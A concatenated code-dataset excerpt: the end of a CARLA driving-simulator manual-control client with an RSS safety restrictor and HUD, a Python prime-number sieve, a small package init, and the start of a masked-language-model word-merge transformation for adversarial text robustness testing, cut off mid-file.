                self._parse_vehicle_keys(pygame.key.get_pressed(), clock.get_time())
                self._control.reverse = self._control.gear < 0
                vehicle_control = self._control
                # Record both the raw and the (possibly) restricted control
                # so the HUD can visualize the RSS intervention.
                world.hud.original_vehicle_control = vehicle_control
                world.hud.restricted_vehicle_control = vehicle_control
                if self._restrictor and self._restrictorEnabled:
                    rss_restriction = self._world.rss_sensor.acceleration_restriction if self._world.rss_sensor and self._world.rss_sensor.response_valid else None
                    if rss_restriction:
                        rss_ego_velocity = self._world.rss_sensor.ego_velocity
                        vehicle_physics = world.player.get_physics_control()
                        # Holding CTRL bypasses the restrictor for this frame.
                        if not (pygame.key.get_mods() & KMOD_CTRL):
                            vehicle_control = self._restrictor.restrictVehicleControl(vehicle_control, rss_restriction, rss_ego_velocity, vehicle_physics)
                            world.hud.restricted_vehicle_control = vehicle_control
                world.player.apply_control(vehicle_control)
            elif isinstance(self._control, carla.WalkerControl):
                self._parse_walker_keys(pygame.key.get_pressed(), clock.get_time())
                world.player.apply_control(self._control)

    def _parse_vehicle_keys(self, keys, milliseconds):
        """Map held keys to throttle/steer/brake; steering ramps over time."""
        self._control.throttle = 1.0 if keys[K_UP] or keys[K_w] else 0.0
        steer_increment = 5e-4 * milliseconds
        if keys[K_LEFT] or keys[K_a]:
            # Reset the cache when reversing direction for a snappier response.
            if self._steer_cache > 0:
                self._steer_cache = 0
            else:
                self._steer_cache -= steer_increment
        elif keys[K_RIGHT] or keys[K_d]:
            if self._steer_cache < 0:
                self._steer_cache = 0
            else:
                self._steer_cache += steer_increment
        else:
            self._steer_cache = 0.0
        self._steer_cache = min(0.7, max(-0.7, self._steer_cache))
        self._control.steer = round(self._steer_cache, 1)
        self._control.brake = 1.0 if keys[K_DOWN] or keys[K_s] else 0.0
        self._control.hand_brake = keys[K_SPACE]

    def _parse_walker_keys(self, keys, milliseconds):
        """Map held keys to walker speed/heading; SHIFT makes the walker run."""
        self._control.speed = 0.0
        if keys[K_DOWN] or keys[K_s]:
            self._control.speed = 0.0
        if keys[K_LEFT] or keys[K_a]:
            self._control.speed = .01
            self._rotation.yaw -= 0.08 * milliseconds
        if keys[K_RIGHT] or keys[K_d]:
            self._control.speed = .01
            self._rotation.yaw += 0.08 * milliseconds
        if keys[K_UP] or keys[K_w]:
            self._control.speed = 3.333 if pygame.key.get_mods() & KMOD_SHIFT else 2.778
        self._control.jump = keys[K_SPACE]
        self._rotation.yaw = round(self._rotation.yaw, 1)
        self._control.direction = self._rotation.get_forward_vector()

    @staticmethod
    def _is_quit_shortcut(key):
        """Return True for ESC or CTRL+Q."""
        return (key == K_ESCAPE) or (key == K_q and pygame.key.get_mods() & KMOD_CTRL)
# ==============================================================================
# -- HUD -----------------------------------------------------------------------
# ==============================================================================
class HUD(object):
    """On-screen heads-up display: telemetry panel, notifications and help."""

    def __init__(self, width, height):
        self.dim = (width, height)
        font = pygame.font.Font(pygame.font.get_default_font(), 20)
        fonts = [x for x in pygame.font.get_fonts() if 'mono' in x]
        default_font = 'ubuntumono'
        mono = default_font if default_font in fonts else fonts[0]
        mono = pygame.font.match_font(mono)
        self._font_mono = pygame.font.Font(mono, 14)
        self._notifications = FadingText(font, (width, 40), (0, height - 40))
        self.help = HelpText(pygame.font.Font(mono, 24), width, height)
        self.server_fps = 0
        self.frame = 0
        self.simulation_time = 0
        self.original_vehicle_control = None
        self.restricted_vehicle_control = None
        self._show_info = True
        self._info_text = []
        self._server_clock = pygame.time.Clock()

    def on_world_tick(self, timestamp):
        """Server-side tick callback: track server FPS and simulation time."""
        self._server_clock.tick()
        self.server_fps = self._server_clock.get_fps()
        self.frame = timestamp.frame
        self.simulation_time = timestamp.elapsed_seconds

    def tick(self, world, clock):
        """Rebuild the info panel contents for this frame."""
        self._notifications.tick(world, clock)
        if not self._show_info:
            return
        t = world.player.get_transform()
        v = world.player.get_velocity()
        c = world.player.get_control()
        # Compass heading derived from yaw.
        heading = 'N' if abs(t.rotation.yaw) < 89.5 else ''
        heading += 'S' if abs(t.rotation.yaw) > 90.5 else ''
        heading += 'E' if 179.5 > t.rotation.yaw > 0.5 else ''
        heading += 'W' if -0.5 > t.rotation.yaw > -179.5 else ''
        # Normalized collision intensity for the last 200 frames (sparkline).
        colhist = world.collision_sensor.get_collision_history()
        collision = [colhist[x + self.frame - 200] for x in range(0, 200)]
        max_col = max(1.0, max(collision))
        collision = [x / max_col for x in collision]
        vehicles = world.world.get_actors().filter('vehicle.*')
        self._info_text = [
            'Server: % 16.0f FPS' % self.server_fps,
            'Client: % 16.0f FPS' % clock.get_fps(),
            '',
            'Vehicle: % 20s' % get_actor_display_name(world.player, truncate=20),
            'Map: % 20s' % world.map.name,
            'Simulation time: % 12s' % datetime.timedelta(seconds=int(self.simulation_time)),
            '',
            'Speed: % 15.0f km/h' % (3.6 * math.sqrt(v.x**2 + v.y**2 + v.z**2)),
            u'Heading:% 16.0f\N{DEGREE SIGN} % 2s' % (t.rotation.yaw, heading),
            'Location:% 20s' % ('(% 5.1f, % 5.1f)' % (t.location.x, t.location.y)),
            'GNSS:% 24s' % ('(% 2.6f, % 3.6f)' % (world.gnss_sensor.lat, world.gnss_sensor.lon)),
            'Height: % 18.0f m' % t.location.z,
            '']
        if isinstance(c, carla.VehicleControl):
            if isinstance(self.original_vehicle_control, carla.VehicleControl):
                # Show both the raw input and the RSS-restricted value as a
                # 5-tuple: (label, original, min, max, restricted).
                orig_control = self.original_vehicle_control
                restricted_control = self.restricted_vehicle_control
                self._info_text += [
                    ('Throttle:', orig_control.throttle, 0.0, 1.0, restricted_control.throttle),
                    ('Steer:', orig_control.steer, -1.0, 1.0, restricted_control.steer),
                    ('Brake:', orig_control.brake, 0.0, 1.0, restricted_control.brake)]
            else:
                self._info_text += [
                    ('Throttle:', c.throttle, 0.0, 1.0),
                    ('Steer:', c.steer, -1.0, 1.0),
                    ('Brake:', c.brake, 0.0, 1.0)]
            self._info_text += [
                ('Reverse:', c.reverse),
                ('Hand brake:', c.hand_brake),
                ('Manual:', c.manual_gear_shift),
                'Gear: %s' % {-1: 'R', 0: 'N'}.get(c.gear, c.gear)]
        elif isinstance(c, carla.WalkerControl):
            self._info_text += [
                ('Speed:', c.speed, 0.0, 5.556),
                ('Jump:', c.jump)]
        self._info_text += [
            '',
            'Collision:',
            collision,
            '',
            'Number of vehicles: % 8d' % len(vehicles)]
        if len(vehicles) > 1:
            self._info_text += ['Nearby vehicles:']
            distance = lambda l: math.sqrt((l.x - t.location.x)**2 + (l.y - t.location.y)**2 + (l.z - t.location.z)**2)
            vehicles = [(distance(x.get_location()), x) for x in vehicles if x.id != world.player.id]
            for d, vehicle in sorted(vehicles):
                if d > 200.0:
                    break
                vehicle_type = get_actor_display_name(vehicle, truncate=22)
                self._info_text.append('% 4dm %s' % (d, vehicle_type))

    def toggle_info(self):
        """Show/hide the info panel."""
        self._show_info = not self._show_info

    def notification(self, text, seconds=2.0):
        """Display a fading notification for *seconds*."""
        self._notifications.set_text(text, seconds=seconds)

    def error(self, text):
        """Display an error notification in red."""
        self._notifications.set_text('Error: %s' % text, (255, 0, 0))

    def render(self, display):
        """Draw the info panel, notifications and help overlay.

        List items become sparkline graphs, tuples become check boxes or
        bars (with a red overlay when the restricted value differs), and
        strings are rendered as plain text lines.
        """
        if self._show_info:
            info_surface = pygame.Surface((220, self.dim[1]))
            info_surface.set_alpha(100)
            display.blit(info_surface, (0, 0))
            v_offset = 4
            bar_h_offset = 100
            bar_width = 106
            for item in self._info_text:
                text_color = (255, 255, 255)
                if v_offset + 18 > self.dim[1]:
                    break
                if isinstance(item, list):
                    if len(item) > 1:
                        points = [(x + 8, v_offset + 8 + (1.0 - y) * 30) for x, y in enumerate(item)]
                        pygame.draw.lines(display, (255, 136, 0), False, points, 2)
                    item = None
                    v_offset += 18
                elif isinstance(item, tuple):
                    if isinstance(item[1], bool):
                        rect = pygame.Rect((bar_h_offset, v_offset + 8), (6, 6))
                        pygame.draw.rect(display, (255, 255, 255), rect, 0 if item[1] else 1)
                    else:
                        rect_border = pygame.Rect((bar_h_offset, v_offset + 8), (bar_width, 6))
                        pygame.draw.rect(display, (255, 255, 255), rect_border, 1)
                        f = (item[1] - item[2]) / (item[3] - item[2])
                        if item[2] < 0.0:
                            rect = pygame.Rect((bar_h_offset + f * (bar_width - 6), v_offset + 8), (6, 6))
                        else:
                            rect = pygame.Rect((bar_h_offset, v_offset + 8), (f * bar_width, 6))
                        pygame.draw.rect(display, (255, 255, 255), rect)
                        if len(item) == 5:
                            # 5-tuple: also draw the restricted value in red.
                            if item[1] != item[4]:
                                pygame.draw.rect(display, (255, 0, 0), rect_border, 1)
                                f = (item[4] - item[2]) / (item[3] - item[2])
                                if item[2] < 0.0:
                                    rect = pygame.Rect((bar_h_offset + f * (bar_width - 6), v_offset + 8), (6, 6))
                                else:
                                    rect = pygame.Rect((bar_h_offset, v_offset + 8), (f * bar_width, 6))
                                pygame.draw.rect(display, (255, 0, 0), rect)
                                text_color = (255, 0, 0)
                    item = item[0]
                if item:  # At this point has to be a str.
                    surface = self._font_mono.render(item, True, text_color)
                    display.blit(surface, (8, v_offset))
                v_offset += 18
        self._notifications.render(display)
        self.help.render(display)
# ==============================================================================
# -- FadingText ----------------------------------------------------------------
# ==============================================================================
class FadingText(object):
    """Short-lived notification text that fades out over time."""

    def __init__(self, font, dim, pos):
        self.font = font
        self.dim = dim
        self.pos = pos
        self.seconds_left = 0
        self.surface = pygame.Surface(self.dim)

    def set_text(self, text, color=(255, 255, 255), seconds=2.0):
        """Replace the current notification and restart the fade timer."""
        rendered = self.font.render(text, True, color)
        self.seconds_left = seconds
        self.surface = pygame.Surface(self.dim)
        self.surface.fill((0, 0, 0, 0))
        self.surface.blit(rendered, (10, 11))

    def tick(self, _, clock):
        """Advance the fade using the elapsed frame time of *clock*."""
        elapsed = 1e-3 * clock.get_time()
        remaining = self.seconds_left - elapsed
        self.seconds_left = max(0.0, remaining)
        # Alpha is proportional to the remaining display time.
        self.surface.set_alpha(500.0 * self.seconds_left)

    def render(self, display):
        """Draw the notification at its fixed position."""
        display.blit(self.surface, self.pos)
# ==============================================================================
# -- HelpText ------------------------------------------------------------------
# ==============================================================================
class HelpText(object):
    """Centered overlay that renders the module docstring as a help screen."""

    def __init__(self, font, width, height):
        help_lines = __doc__.split('\n')
        self.font = font
        self.dim = (680, len(help_lines) * 22 + 12)
        self.pos = (0.5 * width - 0.5 * self.dim[0], 0.5 * height - 0.5 * self.dim[1])
        self.seconds_left = 0
        self.surface = pygame.Surface(self.dim)
        self.surface.fill((0, 0, 0, 0))
        row = 0
        for line in help_lines:
            rendered = self.font.render(line, True, (255, 255, 255))
            self.surface.blit(rendered, (22, row * 22))
            row += 1
        self._render = False
        self.surface.set_alpha(220)

    def toggle(self):
        """Show/hide the help overlay."""
        self._render = not self._render

    def render(self, display):
        """Draw the overlay when it is toggled on."""
        if self._render:
            display.blit(self.surface, self.pos)
# ==============================================================================
# -- CollisionSensor -----------------------------------------------------------
# ==============================================================================
class CollisionSensor(object):
    """Wraps a ``sensor.other.collision`` actor and keeps a bounded history."""

    def __init__(self, parent_actor, hud):
        self.sensor = None
        self.history = []  # (frame, impulse intensity) tuples, capped at 4000
        self._parent = parent_actor
        self.hud = hud
        world = self._parent.get_world()
        bp = world.get_blueprint_library().find('sensor.other.collision')
        self.sensor = world.spawn_actor(bp, carla.Transform(), attach_to=self._parent)
        # We need to pass the lambda a weak reference to self to avoid circular
        # reference.
        weak_self = weakref.ref(self)
        self.sensor.listen(lambda event: CollisionSensor._on_collision(weak_self, event))

    def get_collision_history(self):
        """Return accumulated collision intensity keyed by simulation frame."""
        history = collections.defaultdict(int)
        for frame, intensity in self.history:
            history[frame] += intensity
        return history

    @staticmethod
    def _on_collision(weak_self, event):
        """Sensor callback: record the impulse magnitude and notify the HUD."""
        self = weak_self()
        if not self:
            # Owner was garbage-collected; ignore the late event.
            return
        actor_type = get_actor_display_name(event.other_actor)
        self.hud.notification('Collision with %r' % actor_type)
        impulse = event.normal_impulse
        intensity = math.sqrt(impulse.x**2 + impulse.y**2 + impulse.z**2)
        self.history.append((event.frame, intensity))
        if len(self.history) > 4000:
            self.history.pop(0)
# ==============================================================================
# -- LaneInvasionSensor --------------------------------------------------------
# ==============================================================================
class LaneInvasionSensor(object):
    """Wraps a carla lane-invasion sensor and reports crossed lane markings
    on the HUD."""

    def __init__(self, parent_actor, hud):
        self.sensor = None
        self._parent = parent_actor
        self.hud = hud
        world = self._parent.get_world()
        bp = world.get_blueprint_library().find('sensor.other.lane_invasion')
        self.sensor = world.spawn_actor(bp, carla.Transform(), attach_to=self._parent)
        # Weak reference avoids a sensor -> wrapper reference cycle.
        weak_self = weakref.ref(self)
        self.sensor.listen(lambda event: LaneInvasionSensor._on_invasion(weak_self, event))

    @staticmethod
    def _on_invasion(weak_self, event):
        self = weak_self()
        if self is None:
            return
        lane_types = {marking.type for marking in event.crossed_lane_markings}
        labels = ['%r' % str(lane_type).split()[-1] for lane_type in lane_types]
        self.hud.notification('Crossed line %s' % ' and '.join(labels))
# ==============================================================================
# -- GnssSensor --------------------------------------------------------
# ==============================================================================
class GnssSensor(object):
    """Wraps a carla GNSS sensor mounted on *parent_actor* and mirrors the
    most recent fix into the `lat`/`lon` attributes."""

    def __init__(self, parent_actor):
        self.sensor = None
        self._parent = parent_actor
        self.lat = 0.0
        self.lon = 0.0
        world = self._parent.get_world()
        bp = world.get_blueprint_library().find('sensor.other.gnss')
        self.sensor = world.spawn_actor(bp, carla.Transform(carla.Location(x=1.0, z=2.8)), attach_to=self._parent)
        # Weak reference avoids a sensor -> wrapper reference cycle.
        weak_self = weakref.ref(self)
        self.sensor.listen(lambda event: GnssSensor._on_gnss_event(weak_self, event))

    @staticmethod
    def _on_gnss_event(weak_self, event):
        self = weak_self()
        if self is None:
            return
        self.lat = event.latitude
        self.lon = event.longitude
# ==============================================================================
# -- RssSensor --------------------------------------------------------
# ==============================================================================
class RssSensor(object):
    """Wraps the carla RSS sensor and caches the latest RSS response fields.

    Requires a CARLA PythonAPI built with RSS support ("make PythonAPI.rss");
    a RuntimeError is raised otherwise.
    """

    def __init__(self, parent_actor):
        self.sensor = None
        self._parent = parent_actor
        # Latest response fields, updated by _on_rss_response.
        self.timestamp = None
        self.response_valid = False
        self.lon_response = None
        self.lat_response_right = None
        self.lat_response_left = None
        self.acceleration_restriction = None
        self.ego_velocity = None
        # Verify RSS support *before* touching the blueprint library or
        # spawning anything. The original performed this check after
        # spawn_actor(), so a failed check would leave an orphaned sensor
        # actor alive in the simulator.
        def check_rss_class(clazz):
            return inspect.isclass(clazz) and "RssSensor" in clazz.__name__
        if not inspect.getmembers(carla, check_rss_class):
            raise RuntimeError('CARLA PythonAPI not compiled in RSS variant, please "make PythonAPI.rss"')
        world = self._parent.get_world()
        bp = world.get_blueprint_library().find('sensor.other.rss')
        self.sensor = world.spawn_actor(bp, carla.Transform(carla.Location(x=0.0, z=0.0)), attach_to=self._parent)
        # Weak reference avoids a sensor -> wrapper reference cycle.
        weak_self = weakref.ref(self)
        self.sensor.visualize_results = True
        self.sensor.listen(lambda event: RssSensor._on_rss_response(weak_self, event))

    @staticmethod
    def _on_rss_response(weak_self, response):
        """Copy the fields of *response* onto the wrapper.

        No-op when the wrapper has been garbage collected or the response is
        falsy (matches the original behavior).
        """
        self = weak_self()
        if not self or not response:
            return
        self.timestamp = response.timestamp
        self.response_valid = response.response_valid
        self.lon_response = response.longitudinal_response
        self.lat_response_right = response.lateral_response_right
        self.lat_response_left = response.lateral_response_left
        self.acceleration_restriction = response.acceleration_restriction
        self.ego_velocity = response.ego_velocity
# ==============================================================================
# -- CameraManager -------------------------------------------------------------
# ==============================================================================
class CameraManager(object):
    """Owns the active camera/lidar sensor attached to the player actor and
    converts its latest frame into a pygame surface for rendering.
    """
    def __init__(self, parent_actor, hud):
        self.sensor = None
        self.surface = None
        self._parent = parent_actor
        self.hud = hud
        self.recording = False
        bound_y = 0.5 + self._parent.bounding_box.extent.y
        Attachment = carla.AttachmentType
        # Candidate mounting points: (transform, attachment type); cycled by toggle_camera().
        self._camera_transforms = [
            (carla.Transform(carla.Location(x=-5.5, z=2.5), carla.Rotation(pitch=8.0)), Attachment.SpringArm),
            (carla.Transform(carla.Location(x=1.6, z=1.7)), Attachment.Rigid),
            (carla.Transform(carla.Location(x=5.5, y=1.5, z=1.5)), Attachment.SpringArm),
            (carla.Transform(carla.Location(x=-8.0, z=6.0), carla.Rotation(pitch=6.0)), Attachment.SpringArm),
            (carla.Transform(carla.Location(x=-1, y=-bound_y, z=0.5)), Attachment.Rigid)]
        self.transform_index = 1
        # Each entry: [blueprint id, color converter, display name]; the
        # configured blueprint object is appended as a 4th element below.
        self.sensors = [
            ['sensor.camera.rgb', cc.Raw, 'Camera RGB'],
            ['sensor.camera.depth', cc.Raw, 'Camera Depth (Raw)'],
            ['sensor.camera.depth', cc.Depth, 'Camera Depth (Gray Scale)'],
            ['sensor.camera.depth', cc.LogarithmicDepth, 'Camera Depth (Logarithmic Gray Scale)'],
            ['sensor.camera.semantic_segmentation', cc.Raw, 'Camera Semantic Segmentation (Raw)'],
            ['sensor.camera.semantic_segmentation', cc.CityScapesPalette,
                'Camera Semantic Segmentation (CityScapes Palette)'],
            ['sensor.lidar.ray_cast', None, 'Lidar (Ray-Cast)']]
        world = self._parent.get_world()
        bp_library = world.get_blueprint_library()
        for item in self.sensors:
            bp = bp_library.find(item[0])
            if item[0].startswith('sensor.camera'):
                # Match the camera resolution to the HUD/window size.
                bp.set_attribute('image_size_x', str(hud.dim[0]))
                bp.set_attribute('image_size_y', str(hud.dim[1]))
            elif item[0].startswith('sensor.lidar'):
                bp.set_attribute('range', '5000')
            item.append(bp)
        self.index = None
    def toggle_camera(self):
        """Cycle to the next mounting point, respawning the active sensor there."""
        self.transform_index = (self.transform_index + 1) % len(self._camera_transforms)
        self.set_sensor(self.index, notify=False, force_respawn=True)
    def set_sensor(self, index, notify=True, force_respawn=False):
        """Activate sensor `index` (wraps around); respawn the actor only when
        the blueprint changes or `force_respawn` is set."""
        index = index % len(self.sensors)
        needs_respawn = True if self.index is None else \
            (force_respawn or (self.sensors[index][0] != self.sensors[self.index][0]))
        if needs_respawn:
            if self.sensor is not None:
                self.sensor.destroy()
                self.surface = None
            self.sensor = self._parent.get_world().spawn_actor(
                self.sensors[index][-1],
                self._camera_transforms[self.transform_index][0],
                attach_to=self._parent,
                attachment_type=self._camera_transforms[self.transform_index][1])
            # We need to pass the lambda a weak reference to self to avoid
            # circular reference.
            weak_self = weakref.ref(self)
            self.sensor.listen(lambda image: CameraManager._parse_image(weak_self, image))
        if notify:
            self.hud.notification(self.sensors[index][2])
        self.index = index
    def next_sensor(self):
        """Activate the next sensor in the list."""
        self.set_sensor(self.index + 1)
    def toggle_recording(self):
        """Toggle saving every incoming frame to disk."""
        self.recording = not self.recording
        self.hud.notification('Recording %s' % ('On' if self.recording else 'Off'))
    def render(self, display):
        """Blit the most recent frame (if any) onto the display."""
        if self.surface is not None:
            display.blit(self.surface, (0, 0))
    @staticmethod
    def _parse_image(weak_self, image):
        """Sensor callback: turn the raw frame into a pygame surface.

        Lidar point clouds are projected to a top-down 2D image; camera
        frames are color-converted and their BGRA data reordered to RGB.
        """
        self = weak_self()
        if not self:
            return
        if self.sensors[self.index][0].startswith('sensor.lidar'):
            # Raw lidar data is a flat float32 buffer of (x, y, z) triples.
            points = np.frombuffer(image.raw_data, dtype=np.dtype('f4'))
            points = np.reshape(points, (int(points.shape[0] / 3), 3))
            lidar_data = np.array(points[:, :2])
            # Scale world coordinates to pixels and center on the screen.
            lidar_data *= min(self.hud.dim) / 100.0
            lidar_data += (0.5 * self.hud.dim[0], 0.5 * self.hud.dim[1])
            lidar_data = np.fabs(lidar_data) # pylint: disable=E1111
            lidar_data = lidar_data.astype(np.int32)
            lidar_data = np.reshape(lidar_data, (-1, 2))
            lidar_img_size = (self.hud.dim[0], self.hud.dim[1], 3)
            lidar_img = np.zeros((lidar_img_size), dtype = int)
            # Light up one white pixel per projected point.
            lidar_img[tuple(lidar_data.T)] = (255, 255, 255)
            self.surface = pygame.surfarray.make_surface(lidar_img)
        else:
            image.convert(self.sensors[self.index][1])
            array = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
            array = np.reshape(array, (image.height, image.width, 4))
            # Drop the alpha channel and reverse BGR -> RGB.
            array = array[:, :, :3]
            array = array[:, :, ::-1]
            self.surface = pygame.surfarray.make_surface(array.swapaxes(0, 1))
        if self.recording:
            image.save_to_disk('_out/%08d' % image.frame)
# ==============================================================================
# -- game_loop() ---------------------------------------------------------------
# ==============================================================================
def game_loop(args):
    """Run the interactive client: connect to the simulator, build the world
    and pump the pygame loop at 60 FPS until the controller requests exit.
    Cleans up the recorder, the world actors and pygame on the way out."""
    pygame.init()
    pygame.font.init()
    world = None
    try:
        client = carla.Client(args.host, args.port)
        client.set_timeout(2.0)
        display = pygame.display.set_mode(
            (args.width, args.height),
            pygame.HWSURFACE | pygame.DOUBLEBUF)
        hud = HUD(args.width, args.height)
        world = World(client.get_world(), hud, args.filter, args.rolename)
        controller = KeyboardControl(world, args)
        clock = pygame.time.Clock()
        done = False
        while not done:
            clock.tick_busy_loop(60)
            done = controller.parse_events(client, world, clock)
            if not done:
                world.tick(clock)
                world.render(display)
                pygame.display.flip()
    finally:
        # Tear down in reverse order; the recorder belongs to the client.
        if (world and world.recording_enabled):
            client.stop_recorder()
        if world is not None:
            world.destroy()
        pygame.quit()
# ==============================================================================
# -- main() --------------------------------------------------------------------
# ==============================================================================
def main():
    """Parse the command line, configure logging and hand off to game_loop()."""
    parser = argparse.ArgumentParser(
        description='CARLA Manual Control Client RSS')
    parser.add_argument(
        '-v', '--verbose',
        action='store_true',
        dest='debug',
        help='print debug information')
    parser.add_argument(
        '--host',
        metavar='H',
        default='127.0.0.1',
        help='IP of the host server (default: 127.0.0.1)')
    parser.add_argument(
        '-p', '--port',
        metavar='P',
        default=2000,
        type=int,
        help='TCP port to listen to (default: 2000)')
    parser.add_argument(
        '-a', '--autopilot',
        action='store_true',
        help='enable autopilot')
    parser.add_argument(
        '--res',
        metavar='WIDTHxHEIGHT',
        default='1280x720',
        help='window resolution (default: 1280x720)')
    parser.add_argument(
        '--filter',
        metavar='PATTERN',
        default='vehicle.*',
        help='actor filter (default: "vehicle.*")')
    parser.add_argument(
        '--rolename',
        metavar='NAME',
        default='hero',
        help='actor role name (default: "hero")')
    args = parser.parse_args()
    # Split the WIDTHxHEIGHT resolution string into two ints.
    width, height = args.res.split('x')
    args.width, args.height = int(width), int(height)
    logging.basicConfig(format='%(levelname)s: %(message)s',
                        level=logging.DEBUG if args.debug else logging.INFO)
    logging.info('listening to server %s:%s', args.host, args.port)
    print(__doc__)
    try:
        game_loop(args)
    except KeyboardInterrupt:
        print('\nCancelled by user. Bye!')
if __name__ == '__main__':
    main()
| 43.065911 | 163 | 0.542889 |
4996974e2242e4f9fa2bfeeabce967cc8eb8af94 | 645 | py | Python | python/prime.py | futursolo/Swift-Speed-Test | f64999ae3cc4c13eca50fb2e425bb582c82f2afb | [
"MIT"
] | 4 | 2015-06-22T16:15:14.000Z | 2016-02-02T06:27:01.000Z | python/prime.py | futursolo/Swift-Speed-Test | f64999ae3cc4c13eca50fb2e425bb582c82f2afb | [
"MIT"
] | null | null | null | python/prime.py | futursolo/Swift-Speed-Test | f64999ae3cc4c13eca50fb2e425bb582c82f2afb | [
"MIT"
] | null | null | null | from __future__ import print_function
import math
import time

max_num = 1000000
start_time = time.time()
print("Python Prime Number Calculator, max_num = %d." % max_num)
# Sieve of Eratosthenes: num_list[i] == 1 means i is still a prime candidate.
num_list = [1] * max_num
max_value = 0
for base in range(2, int(math.sqrt(max_num)) + 1):
    if num_list[base]:
        # Knock out every multiple of this prime in one slice assignment.
        num_list[base * 2 :: base] = [0] * len(range(base * 2, max_num, base))
# The largest index still flagged is the largest prime below max_num.
for candidate, flag in enumerate(num_list):
    if flag:
        max_value = candidate
finish_time = time.time()
print("Finished! Max Value is %d, Used Time is %.5f" % (max_value, (finish_time - start_time)))
| 20.15625 | 95 | 0.629457 |
deb2cb5a67fb374ff99c3004a5eed4924c44bbda | 87 | py | Python | copulae/mixtures/gmc/__init__.py | CrisDS81/copulae | 2a312c2b849f95cfb2b40b381d34bc790d9d80c5 | [
"MIT"
] | 100 | 2019-01-30T19:52:04.000Z | 2022-03-18T10:00:17.000Z | copulae/mixtures/gmc/__init__.py | CrisDS81/copulae | 2a312c2b849f95cfb2b40b381d34bc790d9d80c5 | [
"MIT"
] | 30 | 2019-07-14T00:30:03.000Z | 2021-08-24T08:59:14.000Z | copulae/mixtures/gmc/__init__.py | CrisDS81/copulae | 2a312c2b849f95cfb2b40b381d34bc790d9d80c5 | [
"MIT"
] | 25 | 2019-03-10T21:12:55.000Z | 2021-11-09T11:54:16.000Z | from .parameter import GMCParam
from .gmc import EstimateMethod, GaussianMixtureCopula
| 29 | 54 | 0.862069 |
2010827477fad00a4a9d8f3841df4d4a236da580 | 11,064 | py | Python | utils/transformations/word_level/word_masked_lm_merge.py | sharinka0715/AISafety | 1e210dd448a01069aeaba9fa637b68505ad43332 | [
"MIT"
] | null | null | null | utils/transformations/word_level/word_masked_lm_merge.py | sharinka0715/AISafety | 1e210dd448a01069aeaba9fa637b68505ad43332 | [
"MIT"
] | null | null | null | utils/transformations/word_level/word_masked_lm_merge.py | sharinka0715/AISafety | 1e210dd448a01069aeaba9fa637b68505ad43332 | [
"MIT"
] | null | null | null | # !/usr/bin/env python
# coding=UTF-8
"""
@Author: WEN Hao
@LastEditors: WEN Hao
@Description:
@Date: 2021-09-08
@LastEditTime: 2021-11-10
Word Merge by BERT-Masked LM.
"""
import os
from typing import Any, List, NoReturn, Sequence, Optional, Union
import torch
from transformers import AutoModelForMaskedLM, AutoTokenizer, BatchEncoding
from ..base import Transformation
from ...strings import ( # noqa: F401
normalize_language,
LANGUAGE,
normalize_pos_tag,
UNIVERSAL_POSTAG,
check_if_subword,
check_if_punctuations,
strip_BPE_artifacts,
isChinese,
)
from ...strings_en import tokenize
from ...misc import nlp_cache_dir, default_device
from ...attacked_text import AttackedText
__all__ = [
"WordMaskedLMMerge",
]
class WordMaskedLMMerge(Transformation):
    """Generate potential merges of adjacent words using a masked language model.

    For each mergeable pair of adjacent words (see ``find_merge_index``), the
    pair is replaced by a single mask token and the masked LM proposes
    single-word replacements for it.

    Based off of:
        CLARE: Contextualized Perturbation for Textual Adversarial Attack" (Li et al, 2020)
        https://arxiv.org/abs/2009.07502
    """

    __name__ = "WordMaskedLMMerge"

    def __init__(
        self,
        language: str,
        masked_lm_or_path: Union[str, AutoModelForMaskedLM] = "bert-base-uncased",
        tokenizer: Optional[Any] = None,
        max_length: int = 512,
        window_size: Union[int, float] = float("inf"),
        max_candidates: int = 50,
        min_confidence: float = 5e-4,
        batch_size: int = 16,
        device: Optional[torch.device] = None,
        **kwargs: Any,
    ) -> NoReturn:
        """
        Args:
            language:
                Language of the texts to transform.
            masked_lm_or_path:
                Either the name of pretrained masked language model from `transformers` model hub
                or the actual model. Default is `bert-base-uncased`.
            tokenizer:
                The tokenizer of the corresponding model.
                If you passed in name of a pretrained model for `masked_language_model`,
                you can skip this argument as the correct tokenizer can be infered from the name.
                However, if you're passing the actual model, you must provide a tokenizer.
            max_length:
                The max sequence length the masked language model is designed to work with. Default is 512.
            window_size:
                The number of surrounding words to include when making top word prediction.
                For each position to merge, we take `window_size // 2` words to the left
                and `window_size // 2` words to the right and pass the text within the window
                to the masked language model. Default is `float("inf")`, which is equivalent to using the whole text.
            max_candidates:
                Maximum number of candidates to consider as replacements for each word.
                Replacements are ranked by model's confidence.
            min_confidence:
                Minimum confidence threshold each replacement word must pass.
            batch_size:
                Number of masked texts scored by the language model per forward pass.
            device:
                Device to run the language model on; defaults to `default_device`
                (falling back to CPU if moving the model fails).
        """
        super().__init__()
        self._language = normalize_language(language)
        self.max_length = max_length
        self.window_size = window_size
        self.max_candidates = max_candidates
        self.min_confidence = min_confidence
        self.batch_size = batch_size
        if isinstance(masked_lm_or_path, str):
            # Prefer a local copy (the given path, or the shared NLP cache);
            # otherwise let `transformers` resolve the name itself.
            # NOTE: the original loaded the model/tokenizer from the hub name
            # first and then loaded them a *second* time from the local path,
            # doubling the load (and hitting the hub even when a cached copy
            # exists). Load exactly once from the resolved location.
            if os.path.exists(masked_lm_or_path):
                _load_path = masked_lm_or_path
            elif os.path.exists(os.path.join(nlp_cache_dir, masked_lm_or_path)):
                _load_path = os.path.join(nlp_cache_dir, masked_lm_or_path)
            else:
                _load_path = masked_lm_or_path
            self._language_model = AutoModelForMaskedLM.from_pretrained(_load_path)
            self._lm_tokenizer = AutoTokenizer.from_pretrained(
                _load_path, use_fast=True
            )
        else:
            self._language_model = masked_lm_or_path
            if tokenizer is None:
                raise ValueError(
                    "`tokenizer` argument must be provided when passing an actual model as `masked_language_model`."
                )
            self._lm_tokenizer = tokenizer
        try:
            # Honor an explicit `device`; previously this argument was
            # silently ignored and `default_device` was always used.
            self._language_model.to(device if device is not None else default_device)
        except Exception:
            self._language_model.to(torch.device("cpu"))
        self._language_model.eval()
        self.masked_lm_name = self._language_model.__class__.__name__

    def _encode_text(self, text: str) -> BatchEncoding:
        """Encode ``text`` with ``self._lm_tokenizer``.

        Returns a ``BatchEncoding`` (dict-like, keys such as 'input_ids')
        whose tensors are moved to the language model's device.
        """
        encoding = self._lm_tokenizer(
            text,
            max_length=self.max_length,
            truncation=True,
            padding="max_length",
            return_tensors="pt",
        )
        return encoding.to(self._language_model.device)

    def _get_candidates(
